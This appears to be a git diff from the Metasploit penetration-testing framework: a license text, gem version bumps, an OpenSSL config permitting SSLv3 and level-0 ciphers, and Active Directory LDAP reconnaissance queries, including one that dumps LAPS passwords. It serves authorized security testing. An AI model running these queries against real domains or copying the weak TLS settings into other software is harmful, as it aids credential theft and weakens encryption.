+1.5 "Larger Work" means a work which combines Covered Code or portions
+thereof with code not governed by the terms of this License.
+
+1.6 "Modifications" mean any addition to, deletion from, and/or change
+to, the substance and/or structure of the Original Code, any previous
+Modifications, the combination of Original Code and any previous
+Modifications, and/or any respective portions thereof. When code is
+released as a series of files, a Modification is: (a) any addition to
+or deletion from the contents of a file containing Covered Code;
+and/or (b) any new file or other representation of computer program
+statements that contains any part of Covered Code.
+
+1.7 "Original Code" means (a) the Source Code of a program or other
+work as originally made available by Apple under this License,
+including the Source Code of any updates or upgrades to such programs
+or works made available by Apple under this License, and that has been
+expressly identified by Apple as such in the header file(s) of such
+work; and (b) the object code compiled from such Source Code and
+originally made available by Apple under this License.
+
+1.8 "Source Code" means the human readable form of a program or other
+work that is suitable for making modifications to it, including all
+modules it contains, plus any associated interface definition files,
+scripts used to control compilation and installation of an executable
+(object code).
+
+1.9 "You" or "Your" means an individual or a legal entity exercising
+rights under this License. For legal entities, "You" or "Your"
+includes any entity which controls, is controlled by, or is under
+common control with, You, where "control" means (a) the power, direct
+or indirect, to cause the direction or management of such entity,
+whether by contract or otherwise, or (b) ownership of fifty percent
+(50%) or more of the outstanding shares or beneficial ownership of
+such entity.
+
+2. Permitted Uses; Conditions & Restrictions. Subject to the terms
+and conditions of this License, Apple hereby grants You, effective on
+the date You accept this License and download the Original Code, a
+world-wide, royalty-free, non-exclusive license, to the extent of
+Apple's Applicable Patent Rights and copyrights covering the Original
+Code, to do the following:
+
+2.1 Unmodified Code. You may use, reproduce, display, perform,
+internally distribute within Your organization, and Externally Deploy
+verbatim, unmodified copies of the Original Code, for commercial or
+non-commercial purposes, provided that in each instance:
+
+(a) You must retain and reproduce in all copies of Original Code the
+copyright and other proprietary notices and disclaimers of Apple as
+they appear in the Original Code, and keep intact all notices in the
+Original Code that refer to this License; and
+
+(b) You must include a copy of this License with every copy of Source
+Code of Covered Code and documentation You distribute or Externally
+Deploy, and You may not offer or impose any terms on such Source Code
+that alter or restrict this License or the recipients' rights
+hereunder, except as permitted under Section 6.
+
+2.2 Modified Code. You may modify Covered Code and use, reproduce,
+display, perform, internally distribute within Your organization, and
+Externally Deploy Your Modifications and Covered Code, for commercial
+or non-commercial purposes, provided that in each instance You also
+meet all of these conditions:
+
+(a) You must satisfy all the conditions of Section 2.1 with respect to
+the Source Code of the Covered Code;
+
+(b) You must duplicate, to the extent it does not already exist, the
+notice in Exhibit A in each file of the Source Code of all Your
+Modifications, and cause the modified files to carry prominent notices
+stating that You changed the files and the date of any change; and
+
+(c) If You Externally Deploy Your Modifications, You must make
+Source Code of all Your Externally Deployed Modifications either
+available to those to whom You have Externally Deployed Your
+Modifications, or publicly available. Source Code of Your Externally
+Deployed Modifications must be released under the terms set forth in
+this License, including the license grants set forth in Section 3
+below, for as long as you Externally Deploy the Covered Code or twelve
+(12) months from the date of initial External Deployment, whichever is
+longer. You should preferably distribute the Source Code of Your
+Externally Deployed Modifications electronically (e.g. download from a
+web site).
+
+2.3 Distribution of Executable Versions. In addition, if You
+Externally Deploy Covered Code (Original Code and/or Modifications) in
+object code, executable form only, You must include a prominent
+notice, in the code itself as well as in related documentation,
+stating that Source Code of the Covered Code is available under the
+terms of this License with information on how and where to obtain such
+Source Code.
+
+2.4 Third Party Rights. You expressly acknowledge and agree that
+although Apple and each Contributor grants the licenses to their
+respective portions of the Covered Code set forth herein, no
+assurances are provided by Apple or any Contributor that the Covered
+Code does not infringe the patent or other intellectual property
+rights of any other entity. Apple and each Contributor disclaim any
+liability to You for claims brought by any other entity based on
+infringement of intellectual property rights or otherwise. As a
+condition to exercising the rights and licenses granted hereunder, You
+hereby assume sole responsibility to secure any other intellectual
+property rights needed, if any. For example, if a third party patent
+license is required to allow You to distribute the Covered Code, it is
+Your responsibility to acquire that license before distributing the
+Covered Code.
+
+3. Your Grants. In consideration of, and as a condition to, the
+licenses granted to You under this License, You hereby grant to any
+person or entity receiving or distributing Covered Code under this
+License a non-exclusive, royalty-free, perpetual, irrevocable license,
+under Your Applicable Patent Rights and other intellectual property
+rights (other than patent) owned or controlled by You, to use,
+reproduce, display, perform, modify, sublicense, distribute and
+Externally Deploy Your Modifications of the same scope and extent as
+Apple's licenses under Sections 2.1 and 2.2 above.
+
+4. Larger Works. You may create a Larger Work by combining Covered
+Code with other code not governed by the terms of this License and
+distribute the Larger Work as a single product. In each such instance,
+You must make sure the requirements of this License are fulfilled for
+the Covered Code or any portion thereof.
+
+5. Limitations on Patent License. Except as expressly stated in
+Section 2, no other patent rights, express or implied, are granted by
+Apple herein. Modifications and/or Larger Works may require additional
+patent licenses from Apple which Apple may grant in its sole
+discretion.
+
+6. Additional Terms. You may choose to offer, and to charge a fee for,
+warranty, support, indemnity or liability obligations and/or other
+rights consistent with the scope of the license granted herein
+("Additional Terms") to one or more recipients of Covered Code.
+However, You may do so only on Your own behalf and as Your sole
+responsibility, and not on behalf of Apple or any Contributor. You
+must obtain the recipient's agreement that any such Additional Terms
+are offered by You alone, and You hereby agree to indemnify, defend
+and hold Apple and every Contributor harmless for any liability
+incurred by or claims asserted against Apple or such Contributor by
+reason of any such Additional Terms.
+
+7. Versions of the License. Apple may publish revised and/or new
+versions of this License from time to time. Each version will be given
+a distinguishing version number. Once Original Code has been published
+under a particular version of this License, You may continue to use it
+under the terms of that version. You may also choose to use such
+Original Code under the terms of any subsequent version of this
+License published by Apple. No one other than Apple has the right to
+modify the terms applicable to Covered Code created under this
+License.
+
+8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in
+part pre-release, untested, or not fully tested works. The Covered
+Code may contain errors that could cause failures or loss of data, and
+may be incomplete or contain inaccuracies. You expressly acknowledge
+and agree that use of the Covered Code, or any portion thereof, is at
+Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND
+WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND
+APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE
+PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM
+ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT
+NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
+MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
+PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
+PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST
+INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE
+FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS,
+THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR
+ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO
+ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE
+AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY.
+You acknowledge that the Covered Code is not intended for use in the
+operation of nuclear facilities, aircraft navigation, communication
+systems, or air traffic control machines in which case the failure of
+the Covered Code could lead to death, personal injury, or severe
+physical or environmental damage.
+
+9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO
+EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL,
+SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING
+TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR
+ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,
+TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF
+APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
+DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY
+REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF
+INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY
+TO YOU. In no event shall Apple's total liability to You for all
+damages (other than as may be required by applicable law) under this
+License exceed the amount of fifty dollars ($50.00).
+
+10. Trademarks. This License does not grant any rights to use the
+trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS",
+"QuickTime", "QuickTime Streaming Server" or any other trademarks,
+service marks, logos or trade names belonging to Apple (collectively
+"Apple Marks") or to any trademark, service mark, logo or trade name
+belonging to any Contributor. You agree not to use any Apple Marks in
+or as part of the name of products derived from the Original Code or
+to endorse or promote products derived from the Original Code other
+than as expressly permitted by and in strict compliance at all times
+with Apple's third party trademark usage guidelines which are posted
+at http://www.apple.com/legal/guidelinesfor3rdparties.html.
+
+11. Ownership. Subject to the licenses granted under this License,
+each Contributor retains all rights, title and interest in and to any
+Modifications made by such Contributor. Apple retains all rights,
+title and interest in and to the Original Code and any Modifications
+made by or on behalf of Apple ("Apple Modifications"), and such Apple
+Modifications will not be automatically subject to this License. Apple
+may, at its sole discretion, choose to license such Apple
+Modifications under this License, or on different terms from those
+contained in this License or may choose not to license them at all.
+
+12. Termination.
+
+12.1 Termination. This License and the rights granted hereunder will
+terminate:
+
+(a) automatically without notice from Apple if You fail to comply with
+any term(s) of this License and fail to cure such breach within 30
+days of becoming aware of such breach;
+
+(b) immediately in the event of the circumstances described in Section
+13.5(b); or
+
+(c) automatically without notice from Apple if You, at any time during
+the term of this License, commence an action for patent infringement
+against Apple; provided that Apple did not first commence
+an action for patent infringement against You in that instance.
+
+12.2 Effect of Termination. Upon termination, You agree to immediately
+stop any further use, reproduction, modification, sublicensing and
+distribution of the Covered Code. All sublicenses to the Covered Code
+which have been properly granted prior to termination shall survive
+any termination of this License. Provisions which, by their nature,
+should remain in effect beyond the termination of this License shall
+survive, including but not limited to Sections 3, 5, 8, 9, 10, 11,
+12.2 and 13. No party will be liable to any other for compensation,
+indemnity or damages of any sort solely as a result of terminating
+this License in accordance with its terms, and termination of this
+License will be without prejudice to any other right or remedy of
+any party.
+
+13. Miscellaneous.
+
+13.1 Government End Users. The Covered Code is a "commercial item" as
+defined in FAR 2.101. Government software and technical data rights in
+the Covered Code include only those rights customarily provided to the
+public as defined in this License. This customary commercial license
+in technical data and software is provided in accordance with FAR
+12.211 (Technical Data) and 12.212 (Computer Software) and, for
+Department of Defense purchases, DFAR 252.227-7015 (Technical Data --
+Commercial Items) and 227.7202-3 (Rights in Commercial Computer
+Software or Computer Software Documentation). Accordingly, all U.S.
+Government End Users acquire Covered Code with only those rights set
+forth herein.
+
+13.2 Relationship of Parties. This License will not be construed as
+creating an agency, partnership, joint venture or any other form of
+legal association between or among You, Apple or any Contributor, and
+You will not represent to the contrary, whether expressly, by
+implication, appearance or otherwise.
+
+13.3 Independent Development. Nothing in this License will impair
+Apple's right to acquire, license, develop, have others develop for
+it, market and/or distribute technology or products that perform the
+same or similar functions as, or otherwise compete with,
+Modifications, Larger Works, technology or products that You may
+develop, produce, market or distribute.
+
+13.4 Waiver; Construction. Failure by Apple or any Contributor to
+enforce any provision of this License will not be deemed a waiver of
+future enforcement of that or any other provision. Any law or
+regulation which provides that the language of a contract shall be
+construed against the drafter will not apply to this License.
+
+13.5 Severability. (a) If for any reason a court of competent
+jurisdiction finds any provision of this License, or portion thereof,
+to be unenforceable, that provision of the License will be enforced to
+the maximum extent permissible so as to effect the economic benefits
+and intent of the parties, and the remainder of this License will
+continue in full force and effect. (b) Notwithstanding the foregoing,
+if applicable law prohibits or restricts You from fully and/or
+specifically complying with Sections 2 and/or 3 or prevents the
+enforceability of either of those Sections, this License will
+immediately terminate and You must immediately discontinue any use of
+the Covered Code and destroy all copies of it that are in your
+possession or control.
+
+13.6 Dispute Resolution. Any litigation or other dispute resolution
+between You and Apple relating to this License shall take place in the
+Northern District of California, and You and Apple hereby consent to
+the personal jurisdiction of, and venue in, the state and federal
+courts within that District with respect to this License. The
+application of the United Nations Convention on Contracts for the
+International Sale of Goods is expressly excluded.
+
+13.7 Entire Agreement; Governing Law. This License constitutes the
+entire agreement between the parties with respect to the subject
+matter hereof. This License shall be governed by the laws of the
+United States and the State of California, except that body of
+California law concerning conflicts of law.
+
+Where You are located in the province of Quebec, Canada, the following
+clause applies: The parties hereby confirm that they have requested
+that this License and all related documents be drafted in English. Les
+parties ont exige que le present contrat et tous les documents
+connexes soient rediges en anglais.
+
+EXHIBIT A.
+
+"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights
+Reserved.
+
+This file contains Original Code and/or Modifications of Original Code
+as defined in and that are subject to the Apple Public Source License
+Version 2.0 (the 'License'). You may not use this file except in
+compliance with the License. Please obtain a copy of the License at
+http://www.opensource.apple.com/apsl/ and read it before using this
+file.
+
+The Original Code and all software distributed under the License are
+distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+Please see the License for the specific language governing rights and
+limitations under the License."
@@ -1,35 +1,36 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.7, MIT
-actionview, 6.1.7, MIT
-activemodel, 6.1.7, MIT
-activerecord, 6.1.7, MIT
-activesupport, 6.1.7, MIT
+actionpack, 7.0.4.2, MIT
+actionview, 7.0.4.2, MIT
+activemodel, 7.0.4.2, MIT
+activerecord, 7.0.4.2, MIT
+activesupport, 7.0.4.2, MIT
 addressable, 2.8.1, "Apache 2.0"
 afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.671.0, "Apache 2.0"
-aws-sdk-core, 3.168.3, "Apache 2.0"
-aws-sdk-ec2, 1.354.0, "Apache 2.0"
-aws-sdk-iam, 1.73.0, "Apache 2.0"
-aws-sdk-kms, 1.60.0, "Apache 2.0"
-aws-sdk-s3, 1.117.2, "Apache 2.0"
+aws-partitions, 1.722.0, "Apache 2.0"
+aws-sdk-core, 3.170.0, "Apache 2.0"
+aws-sdk-ec2, 1.368.0, "Apache 2.0"
+aws-sdk-iam, 1.75.0, "Apache 2.0"
+aws-sdk-kms, 1.63.0, "Apache 2.0"
+aws-sdk-s3, 1.119.1, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.14, ruby
+bindata, 2.4.15, "Simplified BSD"
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
+chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.1.10, MIT
+concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
-debug, 1.7.0, "ruby, Simplified BSD"
+debug, 1.7.1, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.9, "Apache 2.0"
 docile, 1.4.0, MIT
@@ -37,14 +38,14 @@ domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.11.0, MIT
+erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 3.0.0, MIT
-faraday, 2.7.1, MIT
+faker, 3.1.1, MIT
+faraday, 2.7.4, MIT
 faraday-net_http, 3.0.2, MIT
-faraday-retry, 2.0.0, MIT
+faraday-retry, 2.1.0, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
 filesize, 0.2.0, MIT
@@ -58,39 +59,39 @@ http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.12.0, MIT
-io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.6.1, "ruby, Simplified BSD"
+io-console, 0.6.0, "ruby, Simplified BSD"
+irb, 1.6.3, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
-loofah, 2.19.0, MIT
+loofah, 2.19.1, MIT
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 4.0.5, "New BSD"
-metasploit-credential, 6.0.1, "New BSD"
-metasploit-framework, 6.2.34, "New BSD"
-metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.105, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 5.0.6, "New BSD"
+metasploit-concern, 5.0.1, "New BSD"
+metasploit-credential, 6.0.2, "New BSD"
+metasploit-framework, 6.3.9, "New BSD"
+metasploit-model, 5.0.1, "New BSD"
+metasploit-payloads, 2.0.122, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.2, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
-mini_portile2, 2.8.0, MIT
-minitest, 5.16.3, MIT
-mqtt, 0.5.0, MIT
-msgpack, 1.6.0, "Apache 2.0"
+mini_portile2, 2.8.1, MIT
+minitest, 5.18.0, MIT
+mqtt, 0.6.0, MIT
+msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
 net-ldap, 0.17.1, MIT
-net-protocol, 0.2.0, "ruby, Simplified BSD"
+net-protocol, 0.2.1, "ruby, Simplified BSD"
 net-smtp, 0.3.3, "ruby, Simplified BSD"
 net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.10, MIT
+nokogiri, 1.14.2, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -98,94 +99,96 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.3.0, MIT
+parser, 3.2.1.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.11.0, MIT
-pg, 1.4.5, "Simplified BSD"
-pry, 0.13.1, MIT
-pry-byebug, 3.9.0, MIT
-public_suffix, 5.0.0, MIT
-puma, 6.0.0, "New BSD"
-racc, 1.6.1, "ruby, Simplified BSD"
-rack, 2.2.4, MIT
-rack-protection, 3.0.4, MIT
+pg, 1.4.6, "Simplified BSD"
+pry, 0.14.2, MIT
+pry-byebug, 3.10.1, MIT
+public_suffix, 5.0.1, MIT
+puma, 6.1.1, "New BSD"
+racc, 1.6.2, "ruby, Simplified BSD"
+rack, 2.2.6.3, MIT
+rack-protection, 3.0.5, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.3, MIT
-railties, 6.1.7, MIT
+rails-html-sanitizer, 1.5.0, MIT
+railties, 7.0.4.2, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
+rasn1, 0.12.1, MIT
 rb-readline, 0.5.5, BSD
 recog, 3.0.3, unknown
-redcarpet, 3.5.1, MIT
-regexp_parser, 2.6.1, MIT
-reline, 0.3.1, ruby
+redcarpet, 3.6.0, MIT
+regexp_parser, 2.7.0, MIT
+reline, 0.3.2, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
-rex-core, 0.1.28, "New BSD"
+rex-core, 0.1.30, "New BSD"
 rex-encoder, 0.1.6, "New BSD"
-rex-exploitation, 0.1.36, "New BSD"
+rex-exploitation, 0.1.38, "New BSD"
 rex-java, 0.1.6, "New BSD"
 rex-mime, 0.1.7, "New BSD"
 rex-nop, 0.1.2, "New BSD"
 rex-ole, 0.1.7, "New BSD"
 rex-powershell, 0.1.97, "New BSD"
-rex-random_identifier, 0.1.9, "New BSD"
+rex-random_identifier, 0.1.10, "New BSD"
 rex-registry, 0.1.4, "New BSD"
 rex-rop_builder, 0.1.4, "New BSD"
-rex-socket, 0.1.43, "New BSD"
-rex-sslscan, 0.1.8, "New BSD"
+rex-socket, 0.1.47, "New BSD"
+rex-sslscan, 0.1.9, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.47, "New BSD"
+rex-text, 0.2.50, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.12.0, MIT
-rspec-core, 3.12.0, MIT
-rspec-expectations, 3.12.0, MIT
-rspec-mocks, 3.12.0, MIT
+rspec-core, 3.12.1, MIT
+rspec-expectations, 3.12.2, MIT
+rspec-mocks, 3.12.3, MIT
 rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.12.0, MIT
-rubocop, 1.39.0, MIT
-rubocop-ast, 1.24.0, MIT
+rubocop, 1.48.0, MIT
+rubocop-ast, 1.27.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
-ruby-progressbar, 1.11.0, MIT
+ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.2.1, "New BSD"
+ruby_smb, 3.2.5, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 3.0.4, MIT
-sqlite3, 1.5.4, "New BSD"
+sinatra, 3.0.5, MIT
+sqlite3, 1.6.1, "New BSD"
 sshkey, 2.0.0, MIT
+strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
-tilt, 2.0.11, MIT
+tilt, 2.1.0, MIT
 timecop, 0.9.6, MIT
-timeout, 0.3.1, "ruby, Simplified BSD"
+timeout, 0.3.2, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 2.0.5, MIT
+tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2022.7, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
-unicode-display_width, 2.3.0, MIT
+unicode-display_width, 2.4.2, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
 webrick, 1.7.0, "ruby, Simplified BSD"
 websocket-driver, 0.7.5, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
-windows_error, 0.1.4, BSD
+windows_error, 0.1.5, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
 yard, 0.9.28, MIT
-zeitwerk, 2.6.6, MIT
+zeitwerk, 2.6.7, MIT
@@ -1,4 +1,4 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
 [COPYING](COPYING) for more details.
@@ -47,7 +47,11 @@ module Metasploit
      when "test"
        config.eager_load = false
      when "production"
-        config.eager_load = true
+        config.eager_load = false
+      end
+
+      if ActiveRecord.respond_to?(:legacy_connection_handling=)
+        ActiveRecord.legacy_connection_handling = false
      end
    end
  end
@@ -2,6 +2,7 @@ openssl_conf = openssl_init

 [openssl_init]
 providers = provider_sect
+ssl_conf = ssl_sect

 [provider_sect]
 default = default_sect
@@ -12,3 +13,11 @@ activate = 1

 [legacy_sect]
 activate = 1
+
+[ssl_sect]
+system_default = system_default_sect
+
+[system_default_sect]
+MinProtocol = SSLv3
+CipherString = ALL:@SECLEVEL=0
+Options = UnsafeLegacyRenegotiation
@@ -9,6 +9,7 @@ queries:
      - description
      - displayName
      - sAMAccountName
+      - objectSID
      - userPrincipalName
      - userAccountControl
      - homeDirectory
@@ -28,8 +29,8 @@ queries:
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
-  - action: ENUM_ADCS_CAS
-    description: 'Enumerate ADCS certificate authorities.'
+  - action: ENUM_AD_CS_CAS
+    description: 'Enumerate AD Certificate Service certificate authorities.'
    base_dn_prefix: 'CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration'
    filter: '(objectClass=pKIEnrollmentService)'
    attributes:
@@ -42,8 +43,8 @@ queries:
      - caCertificate
    references:
      - https://aaroneg.com/post/2018-05-15-enterprise-ca/
-  - action: ENUM_ADCS_CERT_TEMPLATES
-    description: 'Enumerate ADCS certificate templates.'
+  - action: ENUM_AD_CS_CERT_TEMPLATES
+    description: 'Enumerate AD Certificate Service certificate templates.'
    base_dn_prefix: 'CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration'
    filter: '(objectClass=pkicertificatetemplate)'
    attributes:
@@ -92,12 +93,14 @@ queries:
    filter: '(|(objectCategory=computer)(objectClass=computer))'
    attributes:
      - dn
+      - name
+      - description
      - displayName
+      - sAMAccountName
+      - objectSID
      - distinguishedName
      - dNSHostName
-      - description
      - givenName
-      - name
      - operatingSystem
      - operatingSystemVersion
      - operatingSystemServicePack
@@ -140,6 +143,18 @@ queries:
      - distinguishedName
    references:
      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
+  - action: ENUM_DOMAIN
+    description: 'Dump info about the Active Directory domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+      - objectSID
+      - name
+      - lockoutduration
+      - lockoutthreshold
+      - minpwdage
+      - maxpwdage
+      - minpwdlength
  - action: ENUM_DOMAIN_CONTROLLERS
    description: 'Dump all known domain controllers.'
    filter: '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
@@ -156,7 +171,7 @@ queries:
      - operatingSystemServicePack
    references:
      - http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
-      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf 
+      - https://adsecurity.org/wp-content/uploads/2016/08/DEFCON24-2016-Metcalf-BeyondTheMCSE-RedTeamingActiveDirectory.pdf
  - action: ENUM_EXCHANGE_RECIPIENTS
    description: 'Dump info about all known Exchange recipients.'
    filter: '(|(mailNickname=*)(proxyAddresses=FAX:*))'
@@ -231,7 +246,7 @@ queries:
      - serverName
    references:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
-      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 
+      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  - action: ENUM_LAPS_PASSWORDS
    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
    filter: '(ms-MCS-AdmPwd=*)'
@@ -253,6 +268,13 @@ queries:
      - dnsHostName
    references:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
+  - action: ENUM_MACHINE_ACCOUNT_QUOTA
+    description: 'Dump the number of computer accounts a user is allowed to create in a domain.'
+    filter: '(objectClass=domain)'
+    attributes:
+      - ms-DS-MachineAccountQuota
+    references:
+      - https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota
  - action: ENUM_ORGROLES
    description: 'Dump info about all known organization roles in the LDAP environment.'
    filter: '(objectClass=organizationalRole)'
@@ -349,4 +371,4 @@ queries:
    references:
      - https://malicious.link/post/2022/ldapsearch-reference/
